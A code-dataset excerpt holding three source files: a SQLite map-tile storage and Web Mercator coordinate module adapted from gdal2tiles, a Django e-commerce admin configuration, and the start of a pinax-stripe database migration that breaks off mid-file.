# Dataset schema: max_stars_repo_path (string, length 3-269) | max_stars_repo_name
# (string, length 4-119) | max_stars_count (int64, 0-191k) | id (string, length 1-7) |
# content (string, length 6-1.05M) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
# --- osm_adaptor.py | nooneisperfect/ReadYourMAPFile | stars: 0 | id: 12797451 ---
#!/usr/bin/env python
#******************************************************************************
# From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $
# VERSION MODIFIED FROM ORIGINAL, comes with no warranty
# <NAME>
# input: vrt file (-addalpha) in 3857 projection (projection is forced due
# to weird effect in AutoCreateWarpedVRT)
# 2 bands: 1 grayscale, one alpha mask
import sqlite3
import os
import math
__version__ = "$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $"
class SqliteTileStorage():
""" Sqlite files methods for simple tile storage"""
def __init__(self, type):
self.type=type
def create(self, filename, overwrite=False):
""" Create a new storage file, overwrite or not if already exists"""
self.filename=filename
CREATEINDEX=True
if overwrite:
if os.path.isfile(self.filename):
os.unlink(self.filename)
else:
if os.path.isfile(self.filename):
CREATEINDEX=False
self.db = sqlite3.connect(self.filename)
cur = self.db.cursor()
cur.execute(
"""
CREATE TABLE IF NOT EXISTS tiles (
x int,
y int,
z int,
s int,
image blob,
PRIMARY KEY(x,y,z,s))
""")
cur.execute(
"""
CREATE TABLE IF NOT EXISTS info (
desc TEXT,
tilenumbering TEXT,
minzoom int,
maxzoom int)
""")
if CREATEINDEX:
cur.execute(
"""
CREATE INDEX IND
ON tiles(x,y,z,s)
""")
cur.execute("insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))", (self.type, ))
self.minzoom = None
self.maxzoom = None
self.written = set()
self.db.commit()
self.pending_images = []
def open(self, filename) :
""" Open an existing file"""
self.filename=filename
if os.path.isfile(self.filename):
self.db = sqlite3.connect(self.filename)
return True
else:
return False
def close(self):
self.commitData(force=True)
cur = self.db.cursor()
cur.execute("UPDATE Info SET minzoom = (?), maxzoom = (?)", (self.minzoom, self.maxzoom))
self.db.commit()
def writeImageFile(self, x, y, z, f) :
""" write a single tile from a file """
self.writeImage(x, y, z, f.read())
def writeImage(self, x, y, z, image) :
""" write a single tile from string """
if (x, y, z) in self.written:
return
self.written.add((x, y, z))
self.pending_images.append((z, x, y, 0, sqlite3.Binary(image)))
if self.minzoom is None or z < self.minzoom:
self.minzoom = z
if self.maxzoom is None or z > self.maxzoom:
self.maxzoom = z
self.commitData()
def commitData(self, force = False):
if len(self.pending_images) > 500 or force:
cur = self.db.cursor()
cur.executemany('insert into tiles (z, x, y,s,image) \
values (?,?,?,?,?)',
self.pending_images)
self.pending_images = []
self.db.commit()
def readImage(self, x, y, z) :
""" read a single tile as string """
cur = self.db.cursor()
cur.execute("select image from tiles where x=? and y=? and z=?", (x, y, z))
res = cur.fetchone()
if res:
            # res[0] is a BLOB; return the raw bytes (str() would yield its repr)
            image = bytes(res[0])
            return image
        else:
            print("No tile found at x=%s y=%s z=%s" % (x, y, z))
            return None
def createFromDirectory(self, filename, basedir, overwrite=False) :
""" Create a new sqlite file from a z/y/x.ext directory structure"""
self.create(filename, overwrite)
        for zs in os.listdir(basedir):
            zz = int(zs)
            for xs in os.listdir(os.path.join(basedir, zs)):
                xx = int(xs)
                for ys in os.listdir(os.path.join(basedir, zs, xs)):
                    yy = int(ys.split('.')[0])
                    print(zz, yy, xx)
                    z = zz
                    x = xx
                    y = yy
                    print(os.path.join(basedir, zs, xs, ys))
                    # open in binary mode: tiles are image data
                    f = open(os.path.join(basedir, zs, xs, ys), 'rb')
                    self.writeImageFile(x, y, z, f)
#cur.execute('insert into tiles (z, x, y,image) \
# values (?,?,?,?)',
# (z, x, y, sqlite3.Binary(f.read())))
def createBigPlanetFromTMS(self, targetname, overwrite=False):
""" Create a new sqlite with BigPlanet numbering scheme from a TMS one"""
target=SqliteTileStorage('BigPlanet')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= 17 - z
yy= 2**zz - y -1
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
def createTMSFromBigPlanet(self, targetname, overwrite=False):
""" Create a new sqlite with TMS numbering scheme from a BigPlanet one"""
target=SqliteTileStorage('TMS')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= 17 - z
yy= 2**zz - y -1
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
def createTMSFromOSM(self, targetname, overwrite=False):
""" Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one"""
target=SqliteTileStorage('TMS')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= z
            # TMS and OSM/Google y axes are mirrored: y' = 2**z - 1 - y
            yy = 2**zz - 1 - y
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
def createOSMFromTMS(self, targetname, overwrite=False):
""" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one"""
target=SqliteTileStorage('OSM')
target.create(targetname, overwrite)
cur = self.db.cursor()
cur.execute("select x, y, z from tiles")
res = cur.fetchall()
for (x, y, z) in res:
xx= x
zz= z
            # TMS and OSM/Google y axes are mirrored: y' = 2**z - 1 - y
            yy = 2**zz - 1 - y
im=self.readImage(x,y,z)
target.writeImage(xx,yy,zz,im)
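# =============================================================================
# # Example usage of SqliteTileStorage (a minimal sketch; the file names and
# # tile coordinates below are illustrative only):
# #
# # store = SqliteTileStorage('TMS')
# # store.create('tiles.sqlite', overwrite=True)
# # with open('tile.png', 'rb') as f:
# #     store.writeImageFile(0, 0, 0, f)   # x, y, z, file object
# # store.close()
# =============================================================================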
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:900913 = EPSG:3785)
for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by <NAME> on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001.
Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in metres XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:900913
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:900913?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913
Polar areas with abs(latitude) bigger than 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:900913?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yeh?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
they were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually noticeable.
How do I create a raster in EPSG:900913 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of these tools support -t_srs 'epsg:900913'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is defined as EPSG:3785. WKT definition is in the official
EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:900913:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tileSize=256):
"Initialize the TMS Global Mercator pyramid"
self.tileSize = tileSize
self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
# 156543.03392804062 for tileSize 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon ):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913"
mx = lon * self.originShift / 180.0
my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my ):
"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, pyr, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913"
mapSize = self.tileSize << zoom
py = mapSize - pyr
res = self.Resolution( zoom )
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level"
res = self.Resolution( zoom )
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
mapSize = self.tileSize << zoom
return px, mapSize - py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int( math.ceil( px / float(self.tileSize) ) - 1 )
ty = int( math.ceil( py / float(self.tileSize) ) - 1 )
return tx, ty
#def PixelsToRaster(self, px, py, zoom):
# "Move the origin of pixel coordinates to top-left corner"
#
# mapSize = self.tileSize << zoom
# return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels( mx, my, zoom)
return self.PixelsToTile( px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:900913 coordinates"
minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom )
maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom )
return ( minx, miny, maxx, maxy )
def TileLatLonBounds(self, tx, ty, zoom ):
"Returns bounds of the given tile in latutude/longitude using WGS84 datum"
bounds = self.TileBounds( tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return ( minLat, minLon, maxLat, maxLon )
def TileLatLonCorners(self, tx, ty, zoom ):
p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom)
p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom)
p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom)
return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon)
def Resolution(self, zoom ):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)
return self.initialResolution / (2**zoom)
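        # e.g. Resolution(0) == 156543.03392804062 m/px and Resolution(1) == 78271.51696402031 m/px
        # for the default 256-pixel tiles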
def ZoomForPixelSize(self, pixelSize ):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i!=0:
return i-1
else:
                    return 0 # We don't want to scale up
        return MAXZOOMLEVEL - 1  # fallback: pixelSize is finer than every zoom level's resolution
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom ):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i-1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
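# =============================================================================
# # Example usage of GlobalMercator (a minimal sketch; the lat/lon below is
# # Zurich and the zoom level is illustrative):
# #
# # mercator = GlobalMercator(tileSize=256)
# # mx, my = mercator.LatLonToMeters(47.3769, 8.5417)   # WGS84 -> EPSG:900913 meters
# # tx, ty = mercator.MetersToTile(mx, my, 12)          # TMS tile containing the point
# # gx, gy = mercator.GoogleTile(tx, ty, 12)            # same tile in Google numbering
# # quadkey = mercator.QuadTree(tx, ty, 12)             # same tile as a Microsoft quadkey
# # print(mercator.TileLatLonBounds(tx, ty, 12))        # tile extent back in lat/lon
# =============================================================================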
# score: 2.484375 | int_score: 2
# --- src/admin.py | erastusnzula/Django-ecommerce | stars: 0 | id: 12797452 ---
from django.contrib import admin
from django.utils.html import format_html
# from django.contrib.auth.models import Group
from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \
Contact, Category, Size
# admin.site.unregister(Group)
class ProductImageModel(admin.StackedInline):
model = ProductImages
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label']
inlines = [ProductImageModel]
list_per_page = 3
    def product_image(self, obj):
        # pass the URL as a format_html argument so it is properly escaped
        return format_html('<img height="80px" src="{}"/>', obj.image.url)
def make_refund_accepted(modeladmin, request, queryset):
queryset.update(cancelled=True, refund_requested=False, refund_granted=True)
make_refund_accepted.short_description = 'Update orders to refund granted'
def make_product_received(modeladmin, request, queryset):
queryset.update(received=True)
make_product_received.short_description = 'Update orders to received'
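# Note: on Django 3.2+ these module-level actions can equivalently be declared with
# the @admin.action(description=...) decorator; the attribute style used above also
# works on older versions.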
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(Order)
class OrderAdmin(admin.ModelAdmin):
list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested',
'refund_granted',
'billing_address', 'shipping_address', 'payment', 'coupon', 'ip']
list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted']
list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon']
search_fields = ['user__username', 'ref_code']
actions = [make_refund_accepted, make_product_received]
readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code',
'products', 'ordered_date']
date_hierarchy = 'ordered_date'
fieldsets = [
('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}),
('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}),
('Ordered Items', {'fields': ['products']}),
('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}),
('Refund', {'fields': ['refund_requested', 'refund_granted']}),
]
@admin.register(CartProduct)
class CartProductAdmin(admin.ModelAdmin):
list_display = ['user', 'product', 'quantity', 'ordered']
readonly_fields = ['user', 'product', 'quantity', 'ordered']
list_per_page = 5
@admin.register(Address)
class AddressAdmin(admin.ModelAdmin):
list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default']
list_filter = ['default', 'address_type', 'country']
search_fields = ['user', 'street_address', 'apartment_address', 'zip']
date_hierarchy = 'date'
@admin.register(Payment)
class PaymentAdmin(admin.ModelAdmin):
readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name',
'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',
'paypal_country_code', 'amount', 'paypal_amount']
list_display = ['user', 'amount', 'timestamp']
list_per_page = 5
date_hierarchy = 'timestamp'
fieldsets = (
('Customer', {'fields': ['user']}),
('Stripe Payment', {'fields': ['stripe_charge_id']}),
('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name',
'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',
'paypal_country_code',
'paypal_amount']}),
('Total Amount Paid', {'fields': ['amount']}),
)
@admin.register(Coupon)
class CouponAdmin(admin.ModelAdmin):
pass
def refund_accepted(modeladmin, request, queryset):
queryset.update(accepted=True)
refund_accepted.short_description = 'Update refund to accepted'
@admin.register(Refund)
class RefundAdmin(admin.ModelAdmin):
list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req']
readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason']
actions = [refund_accepted]
date_hierarchy = 'date_req'
@admin.register(Setting)
class SettingAdmin(admin.ModelAdmin):
pass
@admin.register(Profile)
class ProfileAdmin(admin.ModelAdmin):
fieldsets = [
('User Profile', {'fields': ['user', 'country', 'phone_number']}),
('Profile Photo', {'fields': ['image']}),
]
readonly_fields = ['user', 'country', 'phone_number', 'image']
@admin.register(Contact)
class ContactAdmin(admin.ModelAdmin):
pass
@admin.register(Size)
class SizeAdmin(admin.ModelAdmin):
pass
admin.site.site_title = "EMU"
admin.site.site_header = "EMU"
admin.site.index_title = "Administration"
# score: 1.890625 | int_score: 2
# --- pinax/stripe/migrations/0001_initial.py | bonidjukic/pinax-stripe | stars: 0 | id: 12797453 ---
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-08-06 19:00
from __future__ import unicode_literals
from decimal import Decimal
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import jsonfield.fields
import pinax.stripe.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('business_name', models.TextField(blank=True, null=True)),
('business_url', models.TextField(blank=True, null=True)),
('charges_enabled', models.BooleanField(default=False)),
('country', models.CharField(max_length=2)),
('debit_negative_balances', models.BooleanField(default=False)),
('decline_charge_on_avs_failure', models.BooleanField(default=False)),
('decline_charge_on_cvc_failure', models.BooleanField(default=False)),
('default_currency', models.CharField(max_length=3)),
('details_submitted', models.BooleanField(default=False)),
('display_name', models.TextField(blank=True, null=True)),
('email', models.TextField(blank=True, null=True)),
('legal_entity_address_city', models.TextField(blank=True, null=True)),
('legal_entity_address_country', models.TextField(blank=True, null=True)),
('legal_entity_address_line1', models.TextField(blank=True, null=True)),
('legal_entity_address_line2', models.TextField(blank=True, null=True)),
('legal_entity_address_postal_code', models.TextField(blank=True, null=True)),
('legal_entity_address_state', models.TextField(blank=True, null=True)),
('legal_entity_dob', models.DateField(blank=True, null=True)),
('legal_entity_first_name', models.TextField(blank=True, null=True)),
('legal_entity_gender', models.TextField(blank=True, null=True)),
('legal_entity_last_name', models.TextField(blank=True, null=True)),
('legal_entity_maiden_name', models.TextField(blank=True, null=True)),
('legal_entity_personal_id_number_provided', models.BooleanField(default=False)),
('legal_entity_phone_number', models.TextField(blank=True, null=True)),
('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)),
('legal_entity_type', models.TextField(blank=True, null=True)),
('legal_entity_verification_details', models.TextField(blank=True, null=True)),
('legal_entity_verification_details_code', models.TextField(blank=True, null=True)),
('legal_entity_verification_document', models.TextField(blank=True, null=True)),
('legal_entity_verification_status', models.TextField(blank=True, null=True)),
('type', models.TextField(blank=True, null=True)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)),
('product_description', models.TextField(blank=True, null=True)),
('statement_descriptor', models.TextField(blank=True, null=True)),
('support_email', models.TextField(blank=True, null=True)),
('support_phone', models.TextField(blank=True, null=True)),
('timezone', models.TextField(blank=True, null=True)),
('tos_acceptance_date', models.DateField(blank=True, null=True)),
('tos_acceptance_ip', models.TextField(blank=True, null=True)),
('tos_acceptance_user_agent', models.TextField(blank=True, null=True)),
('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)),
('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)),
('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)),
('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)),
('payout_statement_descriptor', models.TextField(blank=True, null=True)),
('payouts_enabled', models.BooleanField(default=False)),
('verification_disabled_reason', models.TextField(blank=True, null=True)),
('verification_due_by', models.DateTimeField(blank=True, null=True)),
('verification_timestamp', models.DateTimeField(blank=True, null=True)),
('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)),
('authorized', models.BooleanField(default=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BankAccount',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('account_holder_name', models.TextField()),
('account_holder_type', models.TextField()),
('bank_name', models.TextField(blank=True, null=True)),
('country', models.TextField()),
('currency', models.TextField()),
('default_for_currency', models.BooleanField(default=False)),
('fingerprint', models.TextField()),
('last4', models.CharField(max_length=4)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('routing_number', models.TextField()),
('status', models.TextField()),
('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BitcoinReceiver',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('active', models.BooleanField(default=False)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)),
('bitcoin_amount', models.PositiveIntegerField()),
('bitcoin_amount_received', models.PositiveIntegerField(default=0)),
('bitcoin_uri', models.TextField(blank=True)),
('currency', models.CharField(default='usd', max_length=10)),
('description', models.TextField(blank=True)),
('email', models.TextField(blank=True)),
('filled', models.BooleanField(default=False)),
('inbound_address', models.TextField(blank=True)),
('payment', models.TextField(blank=True)),
('refund_address', models.TextField(blank=True)),
('uncaptured_funds', models.BooleanField(default=False)),
('used_for_payment', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Card',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('name', models.TextField(blank=True)),
('address_line_1', models.TextField(blank=True)),
('address_line_1_check', models.CharField(max_length=15)),
('address_line_2', models.TextField(blank=True)),
('address_city', models.TextField(blank=True)),
('address_state', models.TextField(blank=True)),
('address_country', models.TextField(blank=True)),
('address_zip', models.TextField(blank=True)),
('address_zip_check', models.CharField(max_length=15)),
('brand', models.TextField(blank=True)),
('country', models.CharField(blank=True, max_length=2)),
('cvc_check', models.CharField(blank=True, max_length=15)),
('dynamic_last4', models.CharField(blank=True, max_length=4)),
('tokenization_method', models.CharField(blank=True, max_length=15)),
('exp_month', models.IntegerField()),
('exp_year', models.IntegerField()),
('funding', models.CharField(max_length=15)),
('last4', models.CharField(blank=True, max_length=4)),
('fingerprint', models.TextField()),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Charge',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('source', models.CharField(blank=True, max_length=100)),
('currency', models.CharField(default='usd', max_length=10)),
('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('description', models.TextField(blank=True)),
('paid', models.NullBooleanField()),
('disputed', models.NullBooleanField()),
('refunded', models.NullBooleanField()),
('captured', models.NullBooleanField()),
('receipt_sent', models.BooleanField(default=False)),
('charge_created', models.DateTimeField(blank=True, null=True)),
('available', models.BooleanField(default=False)),
('available_on', models.DateTimeField(blank=True, null=True)),
('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('fee_currency', models.CharField(blank=True, max_length=10, null=True)),
('transfer_group', models.TextField(blank=True, null=True)),
('outcome', jsonfield.fields.JSONField(blank=True, null=True)),
],
options={
'abstract': False,
},
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),
),
migrations.CreateModel(
name='Coupon',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('currency', models.CharField(default='usd', max_length=10)),
('duration', models.CharField(default='once', max_length=10)),
('duration_in_months', models.PositiveIntegerField(blank=True, null=True)),
('livemode', models.BooleanField(default=False)),
('max_redemptions', models.PositiveIntegerField(blank=True, null=True)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('percent_off', models.PositiveIntegerField(blank=True, null=True)),
('redeem_by', models.DateTimeField(blank=True, null=True)),
('times_redeemed', models.PositiveIntegerField(blank=True, null=True)),
('valid', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('currency', models.CharField(blank=True, default='usd', max_length=10)),
('delinquent', models.BooleanField(default=False)),
('default_source', models.TextField(blank=True)),
('date_purged', models.DateTimeField(blank=True, editable=False, null=True)),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('kind', models.CharField(max_length=250)),
('livemode', models.BooleanField(default=False)),
('webhook_message', jsonfield.fields.JSONField()),
('validated_message', jsonfield.fields.JSONField(blank=True, null=True)),
('valid', models.NullBooleanField()),
('processed', models.BooleanField(default=False)),
('request', models.CharField(blank=True, max_length=100)),
('pending_webhooks', models.PositiveIntegerField(default=0)),
('api_version', models.CharField(blank=True, max_length=100)),
('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='EventProcessingException',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('data', models.TextField()),
